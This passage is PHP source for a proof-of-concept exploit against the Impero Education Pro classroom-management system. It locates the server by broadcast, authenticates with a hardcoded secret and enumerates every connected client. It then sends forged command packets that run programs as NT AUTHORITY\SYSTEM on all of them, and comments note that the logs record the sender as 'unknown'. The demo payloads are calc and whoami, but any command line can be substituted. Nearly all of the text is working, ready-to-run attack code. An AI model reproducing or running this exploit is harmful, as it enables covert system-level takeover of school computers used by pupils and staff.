socket_set_block($h); $crypted = socket_read($h,$len); $dec = DecryptString($crypted); global $socketid; $dec = explode('|',$dec,2); if ($socketid == -1) $socketid = $dec[0]; return $dec[1]; } function Connect($host,$port = 30015) { echo "Connecting..."; $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_block($h); if ((!$h) || (!socket_connect($h,$host,$port))) { echo "failed.\n"; return false; } echo "done!\nAuthenticating..."; // authenticate SendNetwork($h,"AUTHENTICATE\x02PASSWORD"); echo "done!\nWaiting for response..."; // we should get "AUTH:OK" back $data = RecvNetwork($h); if ($data != "AUTH:OK") { echo "authentication failed.\n"; return false; } echo "authentication succeeded!\nNegotiating..."; SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea"); // we get sent 4 loads of packets. discard all. for ($i = 0; $i < 4; $i++) { RecvNetwork($h); usleep(500000); } //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN"); echo "done!\n"; return $h; } function GetAllClients($h) { $pline = "SENDCLIENTS\x01604\x011\x010\x02"; echo "Getting all clients..."; SendNetwork($h,$pline); $data = RecvNetwork($h); // grab the base64 blob $data = array_pop(explode("\x02",$data)); // unbase64 and uncompress $data = gzdecode(base64_decode($data)); $ret = array(); foreach (explode("\r\n",$data) as $line) { // we only care about clientIDs $ret[] = array_shift(explode("\x03",$line)); } echo "done!\n"; return $ret; } function RunCmd($h,$ids,$cmdline) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline; echo "Sending evil RunCMD data..."; SendNetwork($h,$pline); echo "done!\n"; // if this was a real proper negoiated client we'd get something back // however, we aren't, and we're masquerading as client #0; thus, we don't. // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :) } function RunExeAsSystem($h,$ids,$exe) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password"; echo "Sending evil RunEXE data..."; SendNetwork($h,$pline); echo "done!\n"; // we don't get a response from this one } function FindImperoServer($if,$addr) { $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1); socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if); $str = "ARE_YOU_IMPERO_SERVER"; socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016); socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0)); $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port); if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip; return false; } $socketid = -1; echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n"; if ($argc < 2) { echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n"; echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n"; echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n"; echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n"; die(); } array_shift($argv); foreach ($argv as $key=>$arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) continue; echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key+1],$argv[$key+2]); if ($arg == false) die("[-] Cannot find Impero server\n"); echo "[+] Found Impero server at ".$arg."\n"; $detected = true; } $h = Connect($arg); if ($h === false) continue; $clients = GetAllClients($h); RunExeAsSystem($h,$clients,"calc"); RunCmd($h,$clients,"whoami > C:\lol.txt"); echo "\n"; if ($detected) die(); }